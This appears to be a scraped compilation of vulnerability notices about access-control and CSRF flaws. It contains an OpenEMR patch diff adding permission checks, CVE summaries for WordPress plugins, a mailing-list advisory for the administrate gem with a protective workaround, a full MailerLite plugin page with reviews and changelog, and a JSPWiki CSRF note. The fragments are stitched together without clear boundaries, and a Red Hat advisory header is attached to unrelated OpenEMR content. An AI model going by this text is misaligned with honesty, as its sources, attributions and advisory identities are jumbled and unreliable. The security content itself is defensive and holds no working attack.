RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6043-01

Improper Privilege Management in GitHub repository openemr/openemr prior to 7.0.0.1.

@@ -17,8 +17,18 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

  

//ensure user has proper access

if (!AclMain::aclCheckCore('patients', 'amendment')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Amendments")\]);

exit;

}

$editAccess = AclMain::aclCheckCore('patients', 'amendment', '', 'write');

$addAccess = ($editAccess || AclMain::aclCheckCore('patients', 'amendment', '', 'addonly'));

  

if (isset($\_POST\['mode'\])) {

if (!CsrfUtils::verifyCsrfToken($\_POST\["csrf\_token\_form"\])) {

CsrfUtils::csrfNotVerified();

@@ -28,6 +38,10 @@

$created\_time = date('Y-m-d H:i');

if ($\_POST\["amendment\_id"\] == "") {

// New. Insert

if (!$addAccess) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Amendment Add")\]);

exit;

}

$query = "INSERT INTO amendments SET

amendment\_date = ?,

amendment\_by = ?,

@@ -50,6 +64,10 @@

} else {

$amendment\_id = $\_POST\['amendment\_id'\];

// Existing. Update

if (!$editAccess) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Amendment Edit")\]);

exit;

}

$query = "UPDATE amendments SET

amendment\_date = ?,

amendment\_by = ?,

@@ -102,12 +120,9 @@

$resultSet = sqlStatement($query, array($amendment\_id));

}

  

// Check the ACL

$haveAccess = AclMain::aclCheckCore('patients', 'trans');

$onlyRead = ( $haveAccess ) ? 0 : 1;

$onlyRead = ( $editAccess || ($addAccess && empty($amendment\_id)) ) ? 0 : 1;

$onlyRead = ( $onlyRead || (!empty($amendment\_status)) ) ? 1 : 0;

$customAttributes = ( $onlyRead ) ? array("disabled" => "true") : null;

  

?>

  

<html\>

CVE-2022-2732: bug fix e4 · openemr/openemr@2973592

The Easy Username Updater WordPress plugin before 1.0.5 does not implement CSRF checks, which could allow attackers to make a logged in admin change any user's username includes the admin

CVE-2022-2355

Cross-site request forgery (CSRF) vulnerability in administrate 0.1.4 and earlier allows remote attackers to hijack the user's OAuth autorization code.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**oss-sec mailing list archives**

_From_: Tute Costa <tute () thoughtbot com>  
_Date_: Fri, 1 Apr 2016 13:42:37 -0400  

Cross-site request forgery (CSRF) vulnerability in administrate 0.1.4
and earlier allows remote attackers to hijack the user's OAuth
autorization code.

Versions Affected:  0.1.4 and below
Fixed Versions:     0.1.5

Impact
------

\`Administrate::ApplicationController\` actions didn't have CSRF
protection. Remote attackers can hijack user's sessions and use any
functionality that administrate exposes on their behalf.

Releases
--------

The 0.1.5 release is available at
https://rubygems.org/gems/administrate and
https://github.com/thoughtbot/administrate.

Upgrade Process
---------------

Upgrade administrate version at least to 0.1.5.

Workarounds
-----------

You can reopen Administrate's \`ApplicationController\` to add CSRF
protection to your application:

\`\`\`ruby
module Administrate
  class ApplicationController < ActionController::Base
    protect\_from\_forgery with: :exception
  end
end
\`\`\`

Credits
-------
Thanks to Jason Yeo of SRC:CLR for finding and reporting this vulnerability.

**Current thread:**

*   **Cross-site request forgery (CSRF) vulnerability in administrate gem** _Tute Costa (Apr 01)_

CVE-2016-3098: Cross-site request forgery (CSRF) vulnerability in administrate gem

Cross-Site Request Forgery (CSRF) vulnerability in Rich Reviews by Starfish plugin <= 1.9.14 at WordPress allows an attacker to delete reviews.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of August 2, 2022 and is not available for download. This closure is temporary, pending a full review.

Very bad plugin. Google doesn't show the snippets. When I ask this to the support, they said that I need to wait more. But I've already waited more than 1 year! And still no Google snippets. Go with much more a better plugin.

After a week and no respons i deactivated the plugin. I, and support of Starfish, was not able to activate the license. I need to go on. I have a waiting customer.

This guys will help you everytime! Thanks for such simple and effective tool. Regards, Alex

The plugin code contains a bunch of errors. For example, you will never see a warning if you have not rated a review, even if the rating field in the settings is required. Very bad localization. Many text strings in the plugin are not translated at all, as they are hardcoded. Finally, reviews are sent multiple times. Several duplicate records appear in the database and the same number of notifications are sent to e-mail. So, I does NOT recommend this plugin at all!

Плагин не умеет в локализацию.

doesn't have product as an option.. definitely don't recommend for google snippet.

Read all 115 reviews

“Rich Reviews by Starfish” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2021-36861: Rich Reviews by Starfish

Cross-Site Request Forgery (CSRF) vulnerability in MailerLite – Signup forms (official) plugin <= 1.5.7 at WordPress allows an attacker to change the API key.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**MailerLite – Signup forms (official) plugin**

The Official MailerLite signup forms plugin makes it easy to grow your newsletter subscriber list from your WordPress blog or website. The plugin automatically integrates your WordPress form with your MailerLite email marketing account.

If you don’t have MailerLite account yet, you can signup for a FREE trial here.

Once you activate the plugin, you’ll be able to select and add any of the pre-built webforms from your MailerLite account or create a new form from scratch. You can place the form in the sidebar using a widget or use a shortcode to put it wherever you want.

Setup is fast and easy! You just need to enter your MailerLite account API code and you’re all set.

Plugin features include:

*   Easily-to-add webforms from MailerLite to your WordPress blog or website
*   Option to create new webforms
*   WordPress 5 new editor support
*   Save subscribers automatically to your MailerLite account
*   Place webforms using widget or shortcode
*   Double opt-in signup
*   Updated plugin layout
*   Automate welcome emails from your MailerLite account

**Arbitrary section**

This plugin provides 1 block.

*   MailerLite signup form

**Method 1**

1.  Login to your WordPress admin panel.
2.  Open Plugins in the left sidebar, click Add New, and search for MailerLite plugin.
3.  Install the plugin and activate it.

**Method 2**

1.  Download the MailerLite plugin.
2.  Unzip the downloaded file and upload to your /wp-content/plugins/ folder.
3.  Activate the plugin in WordPress admin panel.

**Setup**

1.  After successful installation you will see MailerLite icon on the left sidebar. Click it.
2.  Enter your MailerLite account API key. You can find it in your MailerLite account by clicking “Developer API” link in the bottom of the page.
3.  Click “Add New Signup Form” .
4.  Choose “Webforms created using MailerLite” if you wan’t to use a signup form that you already created in your MailerLite account or “Custom signup form” if you want to create it now.
5.  If you want to include signup form in the sidebar of your blog or website, go to Appearance > Widgets and drag “MailerLite signup form” to the sidebar. Choose which signup form to display.
6.  If you want to include signup form inside your post or page, use shortcodes. You will see MailerLite icon in your content editor, click it and choose which form to display. It will put a shortcode (for example \[mailerlite\_form form\_id=1\]) and your visitors will see signup form in that place.

**Requirements**

*   Requires PHP5 and CURL.

**What is the plugin license?**

*   This plugin is released under a GPL license.

**What is MailerLite?**

MailerLite is easy to use web-based email marketing software. It can help you create and send email newsletters, manage subscribers, track and analyze results.

**Do I need a MailerLite account to use this plugin?**

Yes, you can easily register at www.mailerlite.com

**How to display a form in posts or pages?**

Use shortcode with form id which you created \[mailerlite\_form form\_id=1\].

Just add “MailerLite signup form widget” and select form you have created

**How to display a form in my template files?**

Use the load\_mailerlite\_form($id) function.

    <?php
    if( function_exists( 'load_mailerlite_form' ) ) {
        load_mailerlite_form(0);
    }
    

**How can I style the sign-up form?**

You can use CSS rules to style the sign-up form, use the following CSS selectors to target the various form elements.

Every form can be different, because element ID of form is:

    #mailerlite-form_(your_form_id)
    

Elements of form can be styled.

    .mailerlite-form .mailerlite-form-title {} /* the form title */
    .mailerlite-form .mailerlite-form-description {} /* the form description */
    .mailerlite-form .mailerlite-form-field label {} /* the form input label */
    .mailerlite-form .mailerlite-form-field input {} /* the form inputs */
    .mailerlite-form .mailerlite-form-loader {} /* the form loading text */
    .mailerlite-form .mailerlite-subscribe-button-container {} /* the form button container */
    .mailerlite-form .mailerlite-subscribe-button-container .mailerlite-subscribe-submit {} /* the form submit button */
    .mailerlite-form .mailerlite-form-response {} /* the form response message */
    

Add your custom CSS rules to the end of your theme stylesheet, /wp-content/themes/your-theme-name/style.css. Do not add them to the plugin stylesheet as they will be automatically overwritten on the next plugin update.

**Where can I find my MailerLite API key?**

Check it here!

The plugin mostly does what it's supposed to. They will occasionally push updates that breaks things and won't respond to any support inquiries. Be careful when updating this plugin.

I installed the plugin since a while, but it has no effect, nothing appear to setup or configure the popups. Actual version of mailer lite officially not tested (1.4.9) with current version of WP (5.8.2).

Plugin works great - I know other people have had trouble with it, but I found it easy and intuitive to integrate. MailerLite has the best support team ever!

It's working well for me so far as purely a mailing list signup mechanism. However, I'd like to be able to add new site member signups to the mailing list too (with their permission, of course). (I have Paid Memberships Pro on one site, which I did have working with Mailchimp, and LearnPress with WooCommerce on the other.) Not sure I'm techy enough to get to grips with using Zapier or some other middleman app to do this!

This is a good plugin to add a for fairly quick and easy. If you are trying to do anything more, you will run out of luck fast. There are no settings or useful code hooks (actions or filters) for customizing redirect to landing page or other useful tricks with forms.

I have no clue how I can get the new created forms visible in Wordpress... I tried a couple of times to add the API key again. And that worked, until the last time. But overall, I really like how easy it is to get the forms created AND visible in Wordpress. No issues what so ever.

Read all 20 reviews

“MailerLite – Signup forms (official)” is open source software. The following people have contributed to this plugin.

Contributors

*    mailerlite

**1.5.9**

*   Update – API client

**1.5.8**

*   Security fix

**1.5.7**

*   Tested up to latest WP version

**1.5.6**

*   Fix – deactivate issue
*   Tested up to latest WP version

**1.5.5**

*   Fix – wp\_nonce for cached pages

**1.5.4**

*   Fix – Input validation
*   Tested up to latest WP version

**1.5.3**

*   Update – API update
*   Tested up to latest WP version

**1.5.2**

*   Fix – Include Universal js

**1.5.1**

*   Fix – Form clear issue

**1.5.0**

*   Tested with WordPress 5.8.3
*   Update – Gutenberg plugin in plain JS

**1.4.10**

*   Update – Plugin display name
*   Tested up to latest WP version

**1.4.9**

*   Forms are embedded with the new method
*   1k limit to webforms API request

**1.4.8**

*   Fix – Gutenberg add / edit form fix

**1.4.7**

*   Tweak – Embedded forms subdomain changed

**1.4.6**

*   Fix – Gutenberg script enqueue called action method was non-static

**1.4.5**

*   Fix – Additional security for AJAX calls

**1.4.4**

*   Fix – Additional security for database queries

**1.4.3**

*   Fix – removed use of deprecated php method

**1.4.2**

*   Fix – Styles on form description bug
*   Update – Added a Load more button for groups on the creation stage phase.
*   Update – Hidden api key

**1.4**

*   Tweak – Show more than 100 groups when creating a custom form
*   Tweak – Renamed some classes to avoid fatal errors from other plugin having the same class names
*   Tweak – Reformatted code to WordPress code style
*   Tweak – Loading custom form javascript after window load for better optimisations
*   Tweak – Switched loading jQuery validate plugin from MailerLite CDN to your local WordPress site

**1.3.6**

*   Feature – Status page to provide information about your environment
*   Tweak – Even better support for older PHP versions in main plugin file
*   Fix – Plugin’s stylesheet is only included in pages where it is required

**1.3.5**

*   Tweak – Better support for older PHP versions in main plugin file

**1.3.4**

*   Fix – Subscriber adding bug

**1.3.3**

*   Fix – Form edit redirect not working

**1.3.2**

*   Fix – Form block js file version bump

**1.3.1**

*   Fix – “Media views” block bug

**1.3**

*   Feature – WordPress 5 block
*   Feature – Double opt-in feature
*   Tweak – New admin design
*   Update – The plugin uses MailerLite API V2 from now on

**1.2.8**

Check WP 5.0 support

**1.2.7**

API url fix

**1.2.6**

Test new WordPress

**1.2.5**

Updated forms (GDPR compatible)

**1.2.4**

release fix

**1.2.3**

fix form protocol

**1.2.2**

mistype fix in version no

**1.2.1**

adding en\_US locale language translation files

**1.2**

some small php notice errors fixed. More clear tooltips about embed forms. Popup script settings moved to settings page. Added en\_US locale translations (the same as en\_EN)

**1.1.25**

short php open tag fix

**1.1.24**

bigger curl timeout for API call, temporary

**1.1.23**

fixed translations, added english .po/.mo files, added “please wait” message translate option to custom forms

**1.1.22**

updated jquery validation script URL to use static.mailerlite.com

**1.1.21**

small bugfixes

**1.1.20**

curl error showing, empty embed form bugfix, other bugfixes

**1.1.19**

translation fixes

**1.1.18**

mistype fix for old versions

**1.1.17**

translation errors for LT language, allowing only embed and button forms

**1.1.16**

*   providing support for older PHP versions

**1.1.15**

*   file\_get\_contents changed to cURL

**1.1.14**

*   custom thank you message added

**1.1.13**

*   tested with 4.6 version

**1.1.12**

*   multisite support

**1.1.11**

*   post escaped with stripslashes\_deep

**1.1.10**

*   mistype – signing up

**1.1.9**

*   fixed app static script url

**1.1.8**

*   fixed old syntax constructors in API classes

**1.1.7**

*   option to activate popup form

**1.1.6**

*   popup webforms added

**1.1.5**

*   php notice fix

**1.1.4**

*   fixed jquery bug

**1.1.3**

*   some problem with version number

**1.1.2**

*   wordpress issue bug fix

**1.1.1**

*   updated readme and version constants

**1.1**

*   tested with up to 4.5.1 wordpress. version. Added list of languages for validation messages. Fixed mistype “sign up”

**1.0.18**

*   added php,wordpress and curl version checks before activation

**1.0.17**

*   fix db queries for update

**1.0.16**

*   links to https, db update charset

**1.0.15**

*   Updated links to knowledge base about api key, changed db charset for table – utf8\_bin

**1.0.14**

*   Removed new lines for some cases

**1.0.13**

*   Empty form description allowed

**1.0.12**

*   Fix mistype in curl method

**1.0.11**

*   Version fix

**1.0.10**

*   Some code refactor, array fixes for PHP older than 5.4

**1.0.9**

*   Curl safe mode fix

**1.0.8**

*   Fix shortcode popup

**1.0.7**

*   Fix shortcode

**1.0.6**

*   Fix embedded form cache

**1.0.5**

*   Fix for WP 4.0

**1.0.4**

*   Subscribe button update

**1.0.3**

*   jQuery load update

**1.0.2**

*   Small changes

**1.0.1**

*   Added translations

**1.0**

*   First release

CVE-2022-33201: MailerLite – Signup forms (official)

A carefully crafted invocation on the Image plugin could trigger an CSRF vulnerability on Apache JSPWiki before 2.11.3, which could allow a group privilege escalation of the attacker's account. Further examination of this issue established that it could also be used to modify the email associated with the attacked account, and then a reset password request from the login page.

**Apache JSPWiki CSRF due to crafted invocation on the Image plugin**

High severity GitHub Reviewed Published Aug 5, 2022 • Updated Aug 11, 2022

Tag

#csrf